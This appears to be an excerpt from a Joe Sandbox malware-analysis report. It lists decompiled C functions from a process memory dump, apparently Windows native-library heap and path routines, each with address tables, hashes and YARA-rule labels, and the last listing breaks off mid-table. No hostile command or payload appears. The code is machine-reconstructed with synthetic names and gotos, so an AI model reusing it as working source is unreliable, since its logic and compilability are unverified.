                    • Instruction Fuzzy Hash: 0A41B175A443189FEF32DF18CD80FAAB7AAEB54610F00409AE9459B381DBB0DD45CB95
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 0172AA16 Relevance: .1, Instructions: 120COMMON
                    Download Yara Rule
                    C-Code - Quality: 100%
                    			E0172AA16(void* __ecx, intOrPtr __edx, signed int _a4, short _a8) {
				intOrPtr _v8;
				char _v12;
				signed int _v16;
				signed char _v20;
				intOrPtr _v24;
				char* _t37;
				void* _t47;
				signed char _t51;
				void* _t53;
				char _t55;
				intOrPtr _t57;
				signed char _t61;
				intOrPtr _t75;
				void* _t76;
				signed int _t81;
				intOrPtr _t82;

				_t53 = __ecx;
				_t55 = 0;
				_v20 = _v20 & 0;
				_t75 = __edx;
				_t81 = ( *(__ecx + 0xc) | _a4) & 0x93000f0b;
				_v24 = __edx;
				_v12 = 0;
				if((_t81 & 0x01000000) != 0) {
					L5:
					if(_a8 != 0) {
						_t81 = _t81 | 0x00000008;
					}
					_t57 = E0172ABF4(_t55 + _t75, _t81);
					_v8 = _t57;
					if(_t57 < _t75 || _t75 > 0x7fffffff) {
						_t76 = 0;
						_v16 = _v16 & 0;
					} else {
						_t59 = _t53;
						_t76 = E0172AB54(_t53, _t75, _t57, _t81 & 0x13000003,  &_v16);
						if(_t76 != 0 && (_t81 & 0x30000f08) != 0) {
							_t47 = E0172AC78(_t53, _t76, _v24, _t59, _v12, _t81, _a8);
							_t61 = _v20;
							if(_t61 != 0) {
								 *(_t47 + 2) =  *(_t47 + 2) ^ ( *(_t47 + 2) ^ _t61) & 0x0000000f;
								if(E0170CB1E(_t61, _t53, _t76, 2, _t47 + 8) < 0) {
									L016877F0(_t53, 0, _t76);
									_t76 = 0;
								}
							}
						}
					}
					_t82 = _v8;
					L16:
					if(E01687D50() == 0) {
						_t37 = 0x7ffe0380;
					} else {
						_t37 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
					}
					if( *_t37 != 0 && ( *( *[fs:0x30] + 0x240) & 0x00000001) != 0) {
						E0172131B(_t53, _t76, _t82, _v16);
					}
					return _t76;
				}
				_t51 =  *(__ecx + 0x20);
				_v20 = _t51;
				if(_t51 == 0) {
					goto L5;
				}
				_t81 = _t81 | 0x00000008;
				if(E0170CB1E(_t51, __ecx, 0, 1,  &_v12) >= 0) {
					_t55 = _v12;
					goto L5;
				} else {
					_t82 = 0;
					_t76 = 0;
					_v16 = _v16 & 0;
					goto L16;
				}
			}



















                    0x0172aa1f
                    0x0172aa21
                    0x0172aa23
                    0x0172aa2b
                    0x0172aa30
                    0x0172aa36
                    0x0172aa39
                    0x0172aa42
                    0x0172aa75
                    0x0172aa7a
                    0x0172aa7c
                    0x0172aa7c
                    0x0172aa88
                    0x0172aa8a
                    0x0172aa8f
                    0x0172ab02
                    0x0172ab04
                    0x0172aa99
                    0x0172aaa8
                    0x0172aaaf
                    0x0172aab3
                    0x0172aacc
                    0x0172aad1
                    0x0172aad6
                    0x0172aae0
                    0x0172aaf3
                    0x0172aaf9
                    0x0172aafe
                    0x0172aafe
                    0x0172aaf3
                    0x0172aad6
                    0x0172aab3
                    0x0172ab07
                    0x0172ab0a
                    0x0172ab11
                    0x0172ab23
                    0x0172ab13
                    0x0172ab1c
                    0x0172ab1c
                    0x0172ab2b
                    0x0172ab44
                    0x0172ab44
                    0x0172ab51
                    0x0172ab51
                    0x0172aa44
                    0x0172aa47
                    0x0172aa4c
                    0x00000000
                    0x00000000
                    0x0172aa5a
                    0x0172aa64
                    0x0172aa72
                    0x00000000
                    0x0172aa66
                    0x0172aa66
                    0x0172aa68
                    0x0172aa6a
                    0x00000000
                    0x0172aa6a

                    Memory Dump Source
                    • Source File: 00000002.00000002.319763701.0000000001640000.00000040.00000800.00020000.00000000.sdmp, Offset: 01640000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_1640000_idczzzzbpy.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 702fa5d1d049179799b5169bcec1b3622bc185bb93763a62bdaaaa196ea10277
                    • Instruction ID: 08130fa2bade56954e26ef7b70e7211662a112abfc5fc5dfa671540b0d3f8dcb
                    • Opcode Fuzzy Hash: 702fa5d1d049179799b5169bcec1b3622bc185bb93763a62bdaaaa196ea10277
                    • Instruction Fuzzy Hash: 52312432F00225ABEB159B69CC44FBFFBBBEF84210F054469E800A7A81DA70CD02C650
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 01678A0A Relevance: .1, Instructions: 120COMMON
                    Download Yara Rule
                    C-Code - Quality: 94%
                    			E01678A0A(intOrPtr* __ecx, signed int __edx) {
				signed int _v8;
				char _v524;
				signed int _v528;
				void* _v532;
				char _v536;
				char _v540;
				char _v544;
				intOrPtr* _v548;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t44;
				void* _t46;
				void* _t48;
				signed int _t53;
				signed int _t55;
				intOrPtr* _t62;
				void* _t63;
				unsigned int _t75;
				signed int _t79;
				unsigned int _t81;
				unsigned int _t83;
				signed int _t84;
				void* _t87;

				_t76 = __edx;
				_v8 =  *0x175d360 ^ _t84;
				_v536 = 0x200;
				_t79 = 0;
				_v548 = __edx;
				_v544 = 0;
				_t62 = __ecx;
				_v540 = 0;
				_v532 =  &_v524;
				if(__edx == 0 || __ecx == 0) {
					L6:
					return E016AB640(_t79, _t62, _v8 ^ _t84, _t76, _t79, _t81);
				} else {
					_v528 = 0;
					E0167E9C0(1, __ecx, 0, 0,  &_v528);
					_t44 = _v528;
					_t81 =  *(_t44 + 0x48) & 0x0000ffff;
					_v528 =  *(_t44 + 0x4a) & 0x0000ffff;
					_t46 = 0xa;
					_t87 = _t81 - _t46;
					if(_t87 > 0 || _t87 == 0) {
						 *_v548 = 0x1641180;
						L5:
						_t79 = 1;
						goto L6;
					} else {
						_t48 = E01691DB5(_t62,  &_v532,  &_v536);
						_t76 = _v528;
						if(_t48 == 0) {
							L9:
							E016A3C2A(_t81, _t76,  &_v544);
							 *_v548 = _v544;
							goto L5;
						}
						_t62 = _v532;
						if(_t62 != 0) {
							_t83 = (_t81 << 0x10) + (_t76 & 0x0000ffff);
							_t53 =  *_t62;
							_v528 = _t53;
							if(_t53 != 0) {
								_t63 = _t62 + 4;
								_t55 = _v528;
								do {
									if( *((intOrPtr*)(_t63 + 0x10)) == 1) {
										if(E01678999(_t63,  &_v540) == 0) {
											_t55 = _v528;
										} else {
											_t75 = (( *(_v540 + 0x14) & 0x0000ffff) << 0x10) + ( *(_v540 + 0x16) & 0x0000ffff);
											_t55 = _v528;
											if(_t75 >= _t83) {
												_t83 = _t75;
											}
										}
									}
									_t63 = _t63 + 0x14;
									_t55 = _t55 - 1;
									_v528 = _t55;
								} while (_t55 != 0);
								_t62 = _v532;
							}
							if(_t62 !=  &_v524) {
								L016877F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t79, _t62);
							}
							_t76 = _t83 & 0x0000ffff;
							_t81 = _t83 >> 0x10;
						}
						goto L9;
					}
				}
			}



























                    0x01678a0a
                    0x01678a1c
                    0x01678a23
                    0x01678a2e
                    0x01678a30
                    0x01678a36
                    0x01678a3c
                    0x01678a3e
                    0x01678a4a
                    0x01678a52
                    0x01678a9c
                    0x01678aae
                    0x01678a58
                    0x01678a5e
                    0x01678a6a
                    0x01678a6f
                    0x01678a75
                    0x01678a7d
                    0x01678a85
                    0x01678a86
                    0x01678a89
                    0x01678a93
                    0x01678a99
                    0x01678a9b
                    0x00000000
                    0x01678aaf
                    0x01678abe
                    0x01678ac3
                    0x01678acb
                    0x01678ad7
                    0x01678ae0
                    0x01678af1
                    0x00000000
                    0x01678af1
                    0x01678acd
                    0x01678ad5
                    0x01678afb
                    0x01678afd
                    0x01678aff
                    0x01678b07
                    0x01678b22
                    0x01678b24
                    0x01678b2a
                    0x01678b2e
                    0x01678b3f
                    0x01678b78
                    0x01678b41
                    0x01678b52
                    0x01678b54
                    0x01678b5c
                    0x01678b74
                    0x01678b74
                    0x01678b5c
                    0x01678b3f
                    0x01678b5e
                    0x01678b61
                    0x01678b64
                    0x01678b64
                    0x01678b6c
                    0x01678b6c
                    0x01678b11
                    0x016c9cd5
                    0x016c9cd5
                    0x01678b17
                    0x01678b1a
                    0x01678b1a
                    0x00000000
                    0x01678ad5
                    0x01678a89

                    Memory Dump Source
                    • Source File: 00000002.00000002.319763701.0000000001640000.00000040.00000800.00020000.00000000.sdmp, Offset: 01640000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_1640000_idczzzzbpy.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 33cebadeed83b2aa214b82d2391bf84980b09915c29c888e135cfdb86aac7be3
                    • Instruction ID: a3d973472ff33cead9b1146628e0147bae8bf08b19df50f82b300a6b8226c213
                    • Opcode Fuzzy Hash: 33cebadeed83b2aa214b82d2391bf84980b09915c29c888e135cfdb86aac7be3
                    • Instruction Fuzzy Hash: 33417EB1A003299BDB24DF59CC8CABAB7B9EB54700F1041EAD91997342E7709E80CF60
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 0172FDE2 Relevance: .1, Instructions: 116COMMON
                    Download Yara Rule
                    C-Code - Quality: 76%
                    			E0172FDE2(signed int* __ecx, signed int __edx, signed int _a4) {
				char _v8;
				signed int _v12;
				signed int _t29;
				char* _t32;
				char* _t43;
				signed int _t80;
				signed int* _t84;

				_push(__ecx);
				_push(__ecx);
				_t56 = __edx;
				_t84 = __ecx;
				_t80 = E0172FD4E(__ecx, __edx);
				_v12 = _t80;
				if(_t80 != 0) {
					_t29 =  *__ecx & _t80;
					_t74 = (_t80 - _t29 >> 4 << __ecx[1]) + _t29;
					if(__edx <= (_t80 - _t29 >> 4 << __ecx[1]) + _t29) {
						E01730A13(__ecx, _t80, 0, _a4);
						_t80 = 1;
						if(E01687D50() == 0) {
							_t32 = 0x7ffe0380;
						} else {
							_t32 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
						}
						if( *_t32 != 0 && ( *( *[fs:0x30] + 0x240) & 0x00000001) != 0) {
							_push(3);
							L21:
							E01721608( *((intOrPtr*)(_t84 + 0x3c)), _t56);
						}
						goto L22;
					}
					if(( *(_t80 + 0xc) & 0x0000000c) != 8) {
						_t80 = E01732B28(__ecx[0xc], _t74, __edx, _a4,  &_v8);
						if(_t80 != 0) {
							_t66 =  *((intOrPtr*)(_t84 + 0x2c));
							_t77 = _v8;
							if(_v8 <=  *((intOrPtr*)( *((intOrPtr*)(_t84 + 0x2c)) + 0x28)) - 8) {
								E0172C8F7(_t66, _t77, 0);
							}
						}
					} else {
						_t80 = E0172DBD2(__ecx[0xb], _t74, __edx, _a4);
					}
					if(E01687D50() == 0) {
						_t43 = 0x7ffe0380;
					} else {
						_t43 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
					}
					if( *_t43 == 0 || ( *( *[fs:0x30] + 0x240) & 0x00000001) == 0 || _t80 == 0) {
						goto L22;
					} else {
						_push((0 | ( *(_v12 + 0xc) & 0x0000000c) != 0x00000008) + 2);
						goto L21;
					}
				} else {
					_push(__ecx);
					_push(_t80);
					E0172A80D(__ecx[0xf], 9, __edx, _t80);
					L22:
					return _t80;
				}
			}










                    0x0172fde7
                    0x0172fde8
                    0x0172fdec
                    0x0172fdee
                    0x0172fdf5
                    0x0172fdf7
                    0x0172fdfc
                    0x0172fe19
                    0x0172fe22
                    0x0172fe26
                    0x0172fec6
                    0x0172fecd
                    0x0172fed5
                    0x0172fee7
                    0x0172fed7
                    0x0172fee0
                    0x0172fee0
                    0x0172feef
                    0x0172ff00
                    0x0172ff02
                    0x0172ff07
                    0x0172ff07
                    0x00000000
                    0x0172feef
                    0x0172fe33
                    0x0172fe55
                    0x0172fe59
                    0x0172fe5b
                    0x0172fe5e
                    0x0172fe69
                    0x0172fe6d
                    0x0172fe6d
                    0x0172fe69
                    0x0172fe35
                    0x0172fe41
                    0x0172fe41
                    0x0172fe79
                    0x0172fe8b
                    0x0172fe7b
                    0x0172fe84
                    0x0172fe84
                    0x0172fe93
                    0x00000000
                    0x0172fea8
                    0x0172feba
                    0x00000000
                    0x0172feba
                    0x0172fdfe
                    0x0172fe01
                    0x0172fe02
                    0x0172fe08
                    0x0172ff0c
                    0x0172ff14
                    0x0172ff14

                    Memory Dump Source
                    • Source File: 00000002.00000002.319763701.0000000001640000.00000040.00000800.00020000.00000000.sdmp, Offset: 01640000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_1640000_idczzzzbpy.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 3ef4319804cf21a17d71333ba11752c881d61f5af92be3a911c0d40f229f6d46
                    • Instruction ID: 16754c1f09daebb72e95bb51647fbaf3c8f143dacc763711c5784449368aaae3
                    • Opcode Fuzzy Hash: 3ef4319804cf21a17d71333ba11752c881d61f5af92be3a911c0d40f229f6d46
                    • Instruction Fuzzy Hash: DD31F432600651AFD3239B68C848F6AFBBAEBC9A50F184158E5468B746DA74DC43C760
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 0172EA55 Relevance: .1, Instructions: 111COMMON
                    Download Yara Rule
                    C-Code - Quality: 70%
                    			E0172EA55(intOrPtr* __ecx, char __edx, signed int _a4) {
				signed int _v8;
				char _v12;
				intOrPtr _v15;
				char _v16;
				intOrPtr _v19;
				void* _v28;
				intOrPtr _v36;
				void* __ebx;
				void* __edi;
				signed char _t26;
				signed int _t27;
				char* _t40;
				unsigned int* _t50;
				intOrPtr* _t58;
				unsigned int _t59;
				char _t75;
				signed int _t86;
				intOrPtr _t88;
				intOrPtr* _t91;

				_t75 = __edx;
				_t91 = __ecx;
				_v12 = __edx;
				_t50 = __ecx + 0x30;
				_t86 = _a4 & 0x00000001;
				if(_t86 == 0) {
					E01682280(_t26, _t50);
					_t75 = _v16;
				}
				_t58 = _t91;
				_t27 = E0172E815(_t58, _t75);
				_v8 = _t27;
				if(_t27 != 0) {
					E0166F900(_t91 + 0x34, _t27);
					if(_t86 == 0) {
						E0167FFB0(_t50, _t86, _t50);
					}
					_push( *((intOrPtr*)(_t91 + 4)));
					_push( *_t91);
					_t59 =  *(_v8 + 0x10);
					_t53 = 1 << (_t59 >> 0x00000002 & 0x0000003f);
					_push(0x8000);
					_t11 = _t53 - 1; // 0x0
					_t12 = _t53 - 1; // 0x0
					_v16 = ((_t59 >> 0x00000001 & 1) + (_t59 >> 0xc) << 0xc) - 1 + (1 << (_t59 >> 0x00000002 & 0x0000003f)) - (_t11 + ((_t59 >> 0x00000001 & 1) + (_t59 >> 0x0000000c) << 0x0000000c) & _t12);
					E0172AFDE( &_v12,  &_v16);
					asm("lock xadd [eax], ecx");
					asm("lock xadd [eax], ecx");
					E0172BCD2(_v8,  *_t91,  *((intOrPtr*)(_t91 + 4)));
					_t55 = _v36;
					_t88 = _v36;
					if(E01687D50() == 0) {
						_t40 = 0x7ffe0388;
					} else {
						_t55 = _v19;
						_t40 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22e;
					}
					if( *_t40 != 0) {
						E0171FE3F(_t55, _t91, _v15, _t55);
					}
				} else {
					if(_t86 == 0) {
						E0167FFB0(_t50, _t86, _t50);
						_t75 = _v16;
					}
					_push(_t58);
					_t88 = 0;
					_push(0);
					E0172A80D(_t91, 8, _t75, 0);
				}
				return _t88;
			}






















                    0x0172ea55
                    0x0172ea66
                    0x0172ea68
                    0x0172ea6c
                    0x0172ea6f
                    0x0172ea72
                    0x0172ea75
                    0x0172ea7a
                    0x0172ea7a
                    0x0172ea7e
                    0x0172ea80
                    0x0172ea85
                    0x0172ea8b
                    0x0172eab5
                    0x0172eabc
                    0x0172eabf
                    0x0172eabf
                    0x0172eaca
                    0x0172eace
                    0x0172ead0
                    0x0172eae4
                    0x0172eaeb
                    0x0172eaf0
                    0x0172eaf5
                    0x0172eb09
                    0x0172eb0d
                    0x0172eb1d
                    0x0172eb2d
                    0x0172eb38
                    0x0172eb3d
                    0x0172eb41
                    0x0172eb4a
                    0x0172eb60
                    0x0172eb4c
                    0x0172eb52
                    0x0172eb59
                    0x0172eb59
                    0x0172eb68
                    0x0172eb71
                    0x0172eb71
                    0x0172ea8d
                    0x0172ea8f
                    0x0172ea92
                    0x0172ea97
                    0x0172ea97
                    0x0172ea9b
                    0x0172ea9c
                    0x0172ea9e
                    0x0172eaa6
                    0x0172eaa6
                    0x0172eb7e

                    Memory Dump Source
                    • Source File: 00000002.00000002.319763701.0000000001640000.00000040.00000800.00020000.00000000.sdmp, Offset: 01640000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_1640000_idczzzzbpy.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: f5f831e91637f778ab1786019c0fe1c1c634a5059deceac50859eb6d9a86e6aa
                    • Instruction ID: 6e1a29199bfee6efeeccbfca4b419f2d7e07177ec0aaf24e9780e0df5daf2949
                    • Opcode Fuzzy Hash: f5f831e91637f778ab1786019c0fe1c1c634a5059deceac50859eb6d9a86e6aa
                    • Instruction Fuzzy Hash: 5431C3326047069BC719DF28CC84E6BF7AAFBC0210F04492DE59287645DE34E906CBA5
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 016E69A6 Relevance: .1, Instructions: 108COMMON
                    Download Yara Rule
                    C-Code - Quality: 69%
                    			E016E69A6(signed short* __ecx, void* __eflags) {
				signed int _v8;
				signed int _v16;
				intOrPtr _v20;
				signed int _v24;
				signed short _v28;
				signed int _v32;
				intOrPtr _v36;
				signed int _v40;
				char* _v44;
				signed int _v48;
				intOrPtr _v52;
				signed int _v56;
				char _v60;
				signed int _v64;
				char _v68;
				char _v72;
				signed short* _v76;
				signed int _v80;
				char _v84;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* _t68;
				intOrPtr _t73;
				signed short* _t74;
				void* _t77;
				void* _t78;
				signed int _t79;
				signed int _t80;

				_v8 =  *0x175d360 ^ _t80;
				_t75 = 0x100;
				_v64 = _v64 & 0x00000000;
				_v76 = __ecx;
				_t79 = 0;
				_t68 = 0;
				_v72 = 1;
				_v68 =  *((intOrPtr*)( *[fs:0x18] + 0x20));
				_t77 = 0;
				if(L01676C59(__ecx[2], 0x100, __eflags) != 0) {
					_t79 =  *((intOrPtr*)( *[fs:0x30] + 0x1e8));
					if(_t79 != 0 && E016E6BA3() != 0) {
						_push(0);
						_push(0);
						_push(0);
						_push(0x1f0003);
						_push( &_v64);
						if(E016A9980() >= 0) {
							E01682280(_t56, 0x1758778);
							_t77 = 1;
							_t68 = 1;
							if( *0x1758774 == 0) {
								asm("cdq");
								 *(_t79 + 0xf70) = _v64;
								 *(_t79 + 0xf74) = 0x100;
								_t75 = 0;
								_t73 = 4;
								_v60 =  &_v68;
								_v52 = _t73;
								_v36 = _t73;
								_t74 = _v76;
								_v44 =  &_v72;
								 *0x1758774 = 1;
								_v56 = 0;
								_v28 = _t74[2];
								_v48 = 0;
								_v20 = ( *_t74 & 0x0000ffff) + 2;
								_v40 = 0;
								_v32 = 0;
								_v24 = 0;
								_v16 = 0;
								if(E0166B6F0(0x164c338, 0x164c288, 3,  &_v60) == 0) {
									_v80 = _v80 | 0xffffffff;
									_push( &_v84);
									_push(0);
									_push(_v64);
									_v84 = 0xfa0a1f00;
									E016A9520();
								}
							}
						}
					}
				}
				if(_v64 != 0) {
					_push(_v64);
					E016A95D0();
					 *(_t79 + 0xf70) =  *(_t79 + 0xf70) & 0x00000000;
					 *(_t79 + 0xf74) =  *(_t79 + 0xf74) & 0x00000000;
				}
				if(_t77 != 0) {
					E0167FFB0(_t68, _t77, 0x1758778);
				}
				_pop(_t78);
				return E016AB640(_t68, _t68, _v8 ^ _t80, _t75, _t78, _t79);
			}
































                    0x016e69b5
                    0x016e69be
                    0x016e69c3
                    0x016e69c9
                    0x016e69cc
                    0x016e69d1
                    0x016e69d3
                    0x016e69de
                    0x016e69e1
                    0x016e69ea
                    0x016e69f6
                    0x016e69fe
                    0x016e6a13
                    0x016e6a14
                    0x016e6a15
                    0x016e6a16
                    0x016e6a1e
                    0x016e6a26
                    0x016e6a31
                    0x016e6a36
                    0x016e6a37
                    0x016e6a40
                    0x016e6a49
                    0x016e6a4a
                    0x016e6a53
                    0x016e6a59
                    0x016e6a5d
                    0x016e6a5e
                    0x016e6a64
                    0x016e6a67
                    0x016e6a6a
                    0x016e6a6d
                    0x016e6a70
                    0x016e6a77
                    0x016e6a7d
                    0x016e6a86
                    0x016e6a89
                    0x016e6a9c
                    0x016e6a9f
                    0x016e6aa2
                    0x016e6aa5
                    0x016e6aaf
                    0x016e6ab1
                    0x016e6ab8
                    0x016e6ab9
                    0x016e6abb
                    0x016e6abe
                    0x016e6ac5
                    0x016e6ac5
                    0x016e6aaf
                    0x016e6a40
                    0x016e6a26
                    0x016e69fe
                    0x016e6ace
                    0x016e6ad0
                    0x016e6ad3
                    0x016e6ad8
                    0x016e6adf
                    0x016e6adf
                    0x016e6ae8
                    0x016e6aef
                    0x016e6aef
                    0x016e6af9
                    0x016e6b06

                    Memory Dump Source
                    • Source File: 00000002.00000002.319763701.0000000001640000.00000040.00000800.00020000.00000000.sdmp, Offset: 01640000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_1640000_idczzzzbpy.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 1bee7c5d26fe4c7e363040ef47c4c02082679335156cb869c15166b80694cc5c
                    • Instruction ID: 923053249c646e3ed88b6e70aa83acba2c0e354ca9827a11e33aa13c40b516a0
                    • Opcode Fuzzy Hash: 1bee7c5d26fe4c7e363040ef47c4c02082679335156cb869c15166b80694cc5c
                    • Instruction Fuzzy Hash: B64199B1D01209AFDB20CFAAC840BEEBBF9EF58314F14862EE915A7240DB709905CB50
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 01665210 Relevance: .1, Instructions: 107COMMON
                    Download Yara Rule
                    C-Code - Quality: 85%
                    			E01665210(intOrPtr _a4, void* _a8) {
				void* __ecx;
				intOrPtr _t31;
				signed int _t32;
				signed int _t33;
				intOrPtr _t35;
				signed int _t52;
				void* _t54;
				void* _t56;
				unsigned int _t59;
				signed int _t60;
				void* _t61;

				_t61 = E016652A5(1);
				if(_t61 == 0) {
					_t31 =  *((intOrPtr*)( *[fs:0x30] + 0x10));
					_t54 =  *((intOrPtr*)(_t31 + 0x28));
					_t59 =  *(_t31 + 0x24) & 0x0000ffff;
				} else {
					_t54 =  *((intOrPtr*)(_t61 + 0x10));
					_t59 =  *(_t61 + 0xc) & 0x0000ffff;
				}
				_t60 = _t59 >> 1;
				_t32 = 0x3a;
				if(_t60 < 2 ||  *((intOrPtr*)(_t54 + _t60 * 2 - 4)) == _t32) {
					_t52 = _t60 + _t60;
					if(_a4 > _t52) {
						goto L5;
					}
					if(_t61 != 0) {
						asm("lock xadd [esi], eax");
						if((_t32 | 0xffffffff) == 0) {
							_push( *((intOrPtr*)(_t61 + 4)));
							E016A95D0();
							L016877F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t61);
						}
					} else {
						E0167EB70(_t54, 0x17579a0);
					}
					_t26 = _t52 + 2; // 0xddeeddf0
					return _t26;
				} else {
					_t52 = _t60 + _t60;
					if(_a4 < _t52) {
						if(_t61 != 0) {
							asm("lock xadd [esi], eax");
							if((_t32 | 0xffffffff) == 0) {
								_push( *((intOrPtr*)(_t61 + 4)));
								E016A95D0();
								L016877F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t61);
							}
						} else {
							E0167EB70(_t54, 0x17579a0);
						}
						return _t52;
					}
					L5:
					_t33 = E016AF3E0(_a8, _t54, _t52);
					if(_t61 == 0) {
						E0167EB70(_t54, 0x17579a0);
					} else {
						asm("lock xadd [esi], eax");
						if((_t33 | 0xffffffff) == 0) {
							_push( *((intOrPtr*)(_t61 + 4)));
							E016A95D0();
							L016877F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t61);
						}
					}
					_t35 = _a8;
					if(_t60 <= 1) {
						L9:
						_t60 = _t60 - 1;
						 *((short*)(_t52 + _t35 - 2)) = 0;
						goto L10;
					} else {
						_t56 = 0x3a;
						if( *((intOrPtr*)(_t35 + _t60 * 2 - 4)) == _t56) {
							 *((short*)(_t52 + _t35)) = 0;
							L10:
							return _t60 + _t60;
						}
						goto L9;
					}
				}
			}














                    0x01665220
                    0x01665224
                    0x016c0d13
                    0x016c0d16
                    0x016c0d19
                    0x0166522a
                    0x0166522a
                    0x0166522d
                    0x0166522d
                    0x01665231
                    0x01665235
                    0x01665239
                    0x016c0d5c
                    0x016c0d62
                    0x00000000
                    0x00000000
                    0x016c0d6a
                    0x016c0d7b
                    0x016c0d7f
                    0x016c0d81
                    0x016c0d84
                    0x016c0d95
                    0x016c0d95
                    0x016c0d6c
                    0x016c0d71
                    0x016c0d71
                    0x016c0d9a
                    0x00000000
                    0x0166524a
                    0x0166524a
                    0x01665250
                    0x016c0d24
                    0x016c0d35
                    0x016c0d39
                    0x016c0d3b
                    0x016c0d3e
                    0x016c0d50
                    0x016c0d50
                    0x016c0d26
                    0x016c0d2b
                    0x016c0d2b
                    0x00000000
                    0x016c0d55
                    0x01665256
                    0x0166525b
                    0x01665265
                    0x016c0da7
                    0x0166526b
                    0x0166526e
                    0x01665272
                    0x016c0db1
                    0x016c0db4
                    0x016c0dc5
                    0x016c0dc5
                    0x01665272
                    0x01665278
                    0x0166527e
                    0x0166528a
                    0x0166528c
                    0x0166528d
                    0x00000000
                    0x01665280
                    0x01665282
                    0x01665288
                    0x0166529f
                    0x01665292
                    0x00000000
                    0x01665292
                    0x00000000
                    0x01665288
                    0x0166527e

                    Memory Dump Source
                    • Source File: 00000002.00000002.319763701.0000000001640000.00000040.00000800.00020000.00000000.sdmp, Offset: 01640000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_1640000_idczzzzbpy.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: ad7b0770e39003e863eea9efab33c79925a6080cc9b1623cb9c9751802305b5e
                    • Instruction ID: 6cca2d75f0f0ac6e754e3ddba6dd199ff91210c67531e1a15e0c06b0f3ae4745
                    • Opcode Fuzzy Hash: ad7b0770e39003e863eea9efab33c79925a6080cc9b1623cb9c9751802305b5e
                    • Instruction Fuzzy Hash: F731E836251601EBC726AB18CD92B7A7BAAFF10B60F11861EF9564B690DB70FC01C694
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 016A3D43 Relevance: .1, Instructions: 106COMMON
                    Download Yara Rule
                    C-Code - Quality: 100%
                    			E016A3D43(signed short* __ecx, signed short* __edx, signed short* _a4, signed short** _a8, intOrPtr* _a12, intOrPtr* _a16) {
				intOrPtr _v8;
				char _v12;
				signed short** _t33;
				short* _t38;
				intOrPtr* _t39;
				intOrPtr* _t41;
				signed short _t43;
				intOrPtr* _t47;
				intOrPtr* _t53;
				signed short _t57;
				intOrPtr _t58;
				signed short _t60;
				signed short* _t61;

				_t47 = __ecx;
				_t61 = __edx;
				_t60 = ( *__ecx & 0x0000ffff) + 2;
				if(_t60 > 0xfffe) {
					L22:
					return 0xc0000106;
				}
				if(__edx != 0) {
					if(_t60 <= ( *(__edx + 2) & 0x0000ffff)) {
						L5:
						E01677B60(0, _t61, 0x16411c4);
						_v12 =  *_t47;
						_v12 = _v12 + 0xfff8;
						_v8 =  *((intOrPtr*)(_t47 + 4)) + 8;
						E01677B60(0xfff8, _t61,  &_v12);
						_t33 = _a8;
						if(_t33 != 0) {
							 *_t33 = _t61;
						}
						 *((short*)(_t61[2] + (( *_t61 & 0x0000ffff) >> 1) * 2)) = 0;
						_t53 = _a12;
						if(_t53 != 0) {
							_t57 = _t61[2];
							_t38 = _t57 + ((( *_t61 & 0x0000ffff) >> 1) - 1) * 2;
							while(_t38 >= _t57) {
								if( *_t38 == 0x5c) {
									_t41 = _t38 + 2;
									if(_t41 == 0) {
										break;
									}
									_t58 = 0;
									if( *_t41 == 0) {
										L19:
										 *_t53 = _t58;
										goto L7;
									}
									 *_t53 = _t41;
									goto L7;
								}
								_t38 = _t38 - 2;
							}
							_t58 = 0;
							goto L19;
						} else {
							L7:
							_t39 = _a16;
							if(_t39 != 0) {
								 *_t39 = 0;
								 *((intOrPtr*)(_t39 + 4)) = 0;
								 *((intOrPtr*)(_t39 + 8)) = 0;
								 *((intOrPtr*)(_t39 + 0xc)) = 0;
							}
							return 0;
						}
					}
					_t61 = _a4;
					if(_t61 != 0) {
						L3:
						_t43 = L01684620(0,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t60);
						_t61[2] = _t43;
						if(_t43 == 0) {
							return 0xc0000017;
						}
						_t61[1] = _t60;
						 *_t61 = 0;
						goto L5;
					}
					goto L22;
				}
				_t61 = _a4;
				if(_t61 == 0) {
					return 0xc000000d;
				}
				goto L3;
			}
















                    0x016a3d4c
                    0x016a3d50
                    0x016a3d55
                    0x016a3d5e
                    0x016de79a
                    0x00000000
                    0x016de79a
                    0x016a3d68
                    0x016de789
                    0x016a3d9d
                    0x016a3da3
                    0x016a3daf
                    0x016a3db5
                    0x016a3dbc
                    0x016a3dc4
                    0x016a3dc9
                    0x016a3dce
                    0x016de7ae
                    0x016de7ae
                    0x016a3dde
                    0x016a3de2
                    0x016a3de7
                    0x016a3e0d
                    0x016a3e13
                    0x016a3e16
                    0x016a3e1e
                    0x016a3e25
                    0x016a3e28
                    0x00000000
                    0x00000000
